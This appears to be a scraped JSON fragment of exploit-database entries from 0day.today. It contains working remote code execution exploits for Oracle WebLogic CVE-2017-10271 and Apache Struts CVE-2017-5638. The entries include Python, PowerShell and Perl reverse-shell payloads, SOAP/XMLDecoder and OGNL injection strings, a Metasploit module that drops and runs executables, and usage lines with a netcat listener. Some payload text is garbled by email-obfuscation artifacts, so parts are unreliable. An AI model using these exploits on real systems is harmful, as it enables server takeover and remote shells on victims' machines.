msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\r\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\r\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\r\n ).format(lhost=self.lhost, lport=self.lport)\r\n else:\r\n # Windows reverse shell\r\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\r\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\r\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\r\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\r\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\r\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\r\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\r\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\r\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\r\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\r\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\r\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\r\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\r\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\r\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\r\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\r\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\r\n )\r\n self.cmd_payload = escape(self.cmd_payload)\r\n \r\n def cmd_base(self):\r\n if self.target == 'win':\r\n return 'cmd'\r\n return '/bin/sh'\r\n \r\n def cmd_opt(self):\r\n if self.target == 'win':\r\n return '/c'\r\n return '-c'\r\n \r\n \r\n def get_generic_check_payload(self):\r\n random_uri = ''.join(\r\n choice(ascii_uppercase + ascii_lowercase + digits)\r\n for _ in range(16))\r\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\r\n <object id=\"url\" class=\"java.net.URL\">\r\n <string>http://{lhost}:{lport}/{random_uri}</string>\r\n </object>\r\n <object idref=\"url\">\r\n <void id=\"stream\" method = \"openStream\" />\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n \r\n return generic_check_payload.format(\r\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\r\n \r\n def get_process_builder_payload(self):\r\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java>\r\n <object class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\" >\r\n <void index=\"0\">\r\n <string>{cmd_base}</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>{cmd_opt}</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>{cmd_payload}</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/>\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\r\n cmd_payload=self.cmd_payload)\r\n \r\n def print_banner(self):\r\n print(\"=\" * 80)\r\n print(\"CVE-2017-10271 RCE Exploit\")\r\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\r\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\r\n print(\"Shell Listener: {lhost}:{lport}\".format(\r\n lhost=self.lhost, lport=self.lport))\r\n print(\"=\" * 80)\r\n \r\n def post_exploit(self, data):\r\n headers = {\r\n \"Content-Type\":\r\n \"text/xml;charset=UTF-8\",\r\n \"User-Agent\":\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\r\n }\r\n payload = \"/wls-wsat/CoordinatorPortType\"\r\n \r\n vulnurl = self.url + payload\r\n try:\r\n req = post(\r\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\r\n if self.check:\r\n print(\"[*] Did you get an HTTP GET request back?\")\r\n else:\r\n print(\"[*] Did you get a shell back?\")\r\n except Exception as e:\r\n print('[!] Connection Error')\r\n print(e)\r\n \r\n def run(self):\r\n self.print_banner()\r\n if self.check:\r\n print('[+] Generating generic check payload')\r\n payload = self.get_generic_check_payload()\r\n else:\r\n print('[+] Generating execution payload')\r\n payload = self.get_process_builder_payload()\r\n print('[*] Generated:')\r\n print(payload)\r\n if self.check:\r\n print('[+] Running generic check payload')\r\n else:\r\n print('[+] Running {target} execute payload').format(target=self.target)\r\n \r\n self.post_exploit(data=payload)\r\n \r\n \r\nif __name__ == \"__main__\":\r\n parser = ArgumentParser(\r\n description=\r\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\r\n )\r\n parser.add_argument(\r\n '-l',\r\n '--lhost',\r\n required=True,\r\n dest='lhost',\r\n nargs='?',\r\n help='The listening host that the remote server should connect back to')\r\n parser.add_argument(\r\n '-p',\r\n '--lport',\r\n required=True,\r\n dest='lport',\r\n nargs='?',\r\n help='The listening port that the remote server should connect back to')\r\n parser.add_argument(\r\n '-r',\r\n '--rhost',\r\n required=True,\r\n dest='rhost',\r\n nargs='?',\r\n help='The remote host base URL that we should send the exploit to')\r\n parser.add_argument(\r\n '-c',\r\n '--check',\r\n dest='check',\r\n action='store_true',\r\n help=\r\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\r\n )\r\n parser.add_argument(\r\n '-w',\r\n '--win',\r\n dest='windows',\r\n action='store_true',\r\n help=\r\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\r\n )\r\n \r\n args = parser.parse_args()\r\n \r\n exploit = Exploit(\r\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\r\n windows=args.windows)\r\n exploit.run()\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29395", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-03-21T00:16:24", "description": "The Oracle WebLogic WLS WSAT component is vulnerable to an XML deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", "cvss3": {}, "published": "2018-01-29T00:00:00", "type": "zdt", "title": "Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-29T00:00:00", "id": "1337DAY-ID-29668", "href": "https://0day.today/exploit/description/29668", "sourceData": "", "sourceHref": "https://0day.today/exploit/29668", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-03-20T05:11:11", "description": "This Metasploit module exploits a remote code execution vulnerability in Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed via http Content-Type header. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "zdt", "title": "Apache Struts Jakarta Multipart Parser OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-15T00:00:00", "id": "1337DAY-ID-27316", "href": "https://0day.today/exploit/description/27316", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vunlerability in Apache Struts\r\n version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed\r\n via http Content-Type header.\r\n\r\n Native payloads will be converted to executables and dropped in the\r\n server's temp dir. If this fails, try a cmd/* payload, which won't\r\n have to write to the disk.\r\n },\r\n 'Author' => [\r\n 'Nike.Zheng', # PoC\r\n 'Nixawk', # Metasploit module\r\n 'Chorder', # Metasploit module\r\n 'egypt', # combining the above\r\n 'Jeffrey Martin', # Java fu\r\n ],\r\n 'References' => [\r\n ['CVE', '2017-5638'],\r\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045']\r\n ],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n [\r\n 'Universal', {\r\n 'Platform' => %w{ unix windows linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Mar 07 2017',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]),\r\n ]\r\n )\r\n register_advanced_options(\r\n [\r\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ])\r\n ]\r\n )\r\n\r\n @data_header = \"X-#{rand_text_alpha(4)}\"\r\n end\r\n\r\n def check\r\n var_a = rand_text_alpha_lower(4)\r\n\r\n ognl = \"\"\r\n ognl << %q|(#[email\u00a0protected]@getProperty('os.name')).|\r\n ognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|\r\n\r\n begin\r\n resp = send_struts_request(ognl)\r\n rescue Msf::Exploit::Failed\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n if resp && resp.code == 200 && resp.headers[var_a]\r\n vprint_good(\"Victim operating system: #{resp.headers[var_a]}\")\r\n Exploit::CheckCode::Vulnerable\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n case payload.arch.first\r\n #when ARCH_JAVA\r\n # datastore['LHOST'] = nil\r\n # resp = send_payload(payload.encoded_jar)\r\n when ARCH_CMD\r\n resp = execute_command(payload.encoded)\r\n else\r\n resp = send_payload(generate_payload_exe)\r\n end\r\n\r\n require'pp'\r\n pp resp.headers if resp\r\n end\r\n\r\n def send_struts_request(ognl, extra_header: '')\r\n uri = normalize_uri(datastore[\"TARGETURI\"])\r\n content_type = \"%{(#_='multipart/form-data').\"\r\n content_type << \"(#[email\u00a0protected]@DEFAULT_MEMBER_ACCESS).\"\r\n content_type << \"(#_memberAccess?\"\r\n content_type << \"(#_memberAccess=#dm):\"\r\n content_type << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\"\r\n content_type << \"(#ognlUtil=#container.getInstance(@[email\u00a0protected])).\"\r\n content_type << \"(#ognlUtil.getExcludedPackageNames().clear()).\"\r\n content_type << \"(#ognlUtil.getExcludedClasses().clear()).\"\r\n content_type << \"(#context.setMemberAccess(#dm)))).\"\r\n content_type << ognl\r\n content_type << \"}\"\r\n\r\n headers = { 'Content-Type' => content_type }\r\n if extra_header\r\n headers[@data_header] = extra_header\r\n end\r\n\r\n #puts content_type.gsub(\").\", \").\\n\")\r\n #puts\r\n\r\n resp = send_request_cgi(\r\n 'uri' => uri,\r\n 'method' => datastore['HTTPMethod'],\r\n 'headers' => headers\r\n )\r\n\r\n if resp && resp.code == 404\r\n fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')\r\n end\r\n resp\r\n end\r\n\r\n def execute_command(cmd)\r\n ognl = ''\r\n ognl << %Q|(#[email\u00a0protected]@getRequest().getHeader('#{@data_header}')).|\r\n\r\n # You can add headers to the server's response for debugging with this:\r\n #ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|\r\n #ognl << %q|(#r.addHeader('decoded',#cmd)).|\r\n\r\n ognl << %q|(#[email\u00a0protected]@getProperty('os.name')).|\r\n ognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).|\r\n ognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).|\r\n ognl << %q|(#p.redirectErrorStream(true)).|\r\n ognl << %q|(#process=#p.start())|\r\n\r\n send_struts_request(ognl, extra_header: cmd)\r\n end\r\n\r\n def send_payload(exe)\r\n\r\n ognl = \"\"\r\n ognl << %Q|(#[email\u00a0protected]@getRequest().getHeader('#{@data_header}')).|\r\n ognl << %Q|(#[email\u00a0protected]@createTempFile('#{rand_text_alpha(4)}','.exe')).|\r\n #ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|\r\n #ognl << %q|(#r.addHeader('file',#f.getAbsolutePath())).|\r\n ognl << %q|(#f.setExecutable(true)).|\r\n ognl << %q|(#f.deleteOnExit()).|\r\n ognl << %q|(#fos=new java.io.FileOutputStream(#f)).|\r\n\r\n # Using stuff from the sun.* package here means it likely won't work on\r\n # non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to\r\n # work and I don't see a better way of getting binary data onto the\r\n # system. =/\r\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).|\r\n ognl << %q|(#fos.write(#d)).|\r\n ognl << %q|(#fos.close()).|\r\n\r\n ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|\r\n ognl << %q|(#p.start()).|\r\n ognl << %q|(#f.delete())|\r\n\r\n send_struts_request(ognl, extra_header: [exe].pack(\"m\").delete(\"\\n\"))\r\n end\r\n\r\nend\r\n\r\n=begin\r\nDoesn't work:\r\n\r\n ognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).|\r\n ognl << %q|(#c=#cl.loadClass('metasploit.Payload')).|\r\n ognl << %q|(#[email\u00a0protected]@getMethods(#c,'main',true).get(0)).|\r\n ognl << %q|(#r.addHeader('meth',#m.toGenericString())).|\r\n ognl << %q|(#m.invoke(null,null)).|\r\n\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('java.lang.Object'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('java.lang.String'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('java.lang.String')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('java.lang.String')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('java.lang.String')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).| # parse failed\r\n #ognl << %q|(#m=#c.getMethod('run',null)).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('java.lang.Object'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('java.lang.String'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('java.lang.String')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('java.lang.String')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).| # parse failed\r\n #ognl << %q|(#m=#c.getMethod('main',null)).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n\r\n=end\n\n# 0day.today [2018-03-20] #", "sourceHref": "https://0day.today/exploit/27316", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-20T03:15:54", "description": "Apache Struts 2 versions 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 remote code execution exploit that provides a reverse shell.#### Usage Info\nTested with tomcat8\r Install tomcat8\r Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638\r Ex:\r Open: $ nc -lnvp 4444\r python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444\r python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --test\r python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --cmd='uname -a'", "cvss3": {}, "published": "2017-03-12T00:00:00", "type": "zdt", "title": "Apache Struts 2 2.3.x / 2.5.x Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-12T00:00:00", "id": "1337DAY-ID-27300", "href": "https://0day.today/exploit/description/27300", "sourceData": "# CVE-2017-5638\r\n# Apache Struts 2 Vulnerability Remote Code Execution\r\n# Reverse shell from target\r\n# Author: anarc0der - github.com/anarcoder\r\n# Tested with tomcat8\r\n\r\n# Install tomcat8\r\n# Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638\r\n\r\n# Ex:\r\n# Open: $ nc -lnvp 4444\r\n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444\r\n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --test\r\n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --cmd='uname -a'\r\n\r\n\r\n\"\"\"\r\nUsage:\r\n struntsrce.py --target=<arg> --test\r\n struntsrce.py --target=<arg> --cmd=<arg>\r\n struntsrce.py --target=<arg> --ip=<arg> --port=<arg>\r\n struntsrce.py --help\r\n struntsrce.py --version\r\nOptions:\r\n -h --help Open help menu\r\n -v --version Show version\r\nRequired options:\r\n --target='url target' your target :)\r\n --test check if target is vulnerable or not\r\n --cmd='uname -a' your command to execute in target\r\n --ip='10.10.10.1' your ip\r\n --port=4444 open port for back connection\r\n\"\"\"\r\n\r\nimport urllib2\r\nimport httplib\r\nimport os\r\nimport sys\r\nfrom docopt import docopt, DocoptExit\r\n\r\n\r\nclass CVE_2017_5638():\r\n\r\n def __init__(self, p_target):\r\n self.target = p_target\r\n # self.ip = p_ip\r\n # self.port = p_port\r\n # self.exploit()\r\n\r\n def generate_revshell(self, p_ip, p_port):\r\n revshell = \"perl -e \\\\'use Socket;$i=\\\"{0}\\\";$p={1};\"\\\r\n \"socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));\"\\\r\n \"if(connect(S,sockaddr_in($p,inet_aton($i)))){{open\"\\\r\n \"(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");\"\\\r\n \"open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};\\\\'\"\r\n return revshell.format(p_ip, p_port)\r\n\r\n def generate_payload(self, p_cmd):\r\n payload = \"%{{(#_='multipart/form-data').\"\\\r\n \"(#[email\u00a0protected][email\u00a0protected]_MEMBER_ACCESS).\"\\\r\n \"(#_memberAccess?\"\\\r\n \"(#_memberAccess=#dm):\"\\\r\n \"((#container=#context['com.opensymphony.xwork2.\"\\\r\n \"ActionContext.container']).\"\\\r\n \"(#ognlUtil=#container.getInstance(@com.opensymphony.\"\\\r\n \"[email\u00a0protected])).\"\\\r\n \"(#ognlUtil.getExcludedPackageNames().clear()).\"\\\r\n \"(#ognlUtil.getExcludedClasses().clear()).\"\\\r\n \"(#context.setMemberAccess(#dm)))).\"\\\r\n \"(#cmd='{0}').\"\\\r\n \"(#iswin=(@[email\u00a0protected]('os.name').\"\\\r\n \"toLowerCase().contains('win'))).\"\\\r\n \"(#cmds=(#iswin?{{'cmd.exe','/c',#cmd}}:\"\\\r\n \"{{'/bin/bash','-c',#cmd}})).\"\\\r\n \"(#p=new java.lang.ProcessBuilder(#cmds)).\"\\\r\n \"(#p.redirectErrorStream(true)).(#process=#p.start()).\"\\\r\n \"(#ros=(@[email\u00a0protected]\"\\\r\n \"Response().getOutputStream())).\"\\\r\n \"(@[email\u00a0protected]\"\\\r\n \"(#process.getInputStream(),#ros)).(#ros.flush())}}\"\r\n return payload.format(p_cmd)\r\n\r\n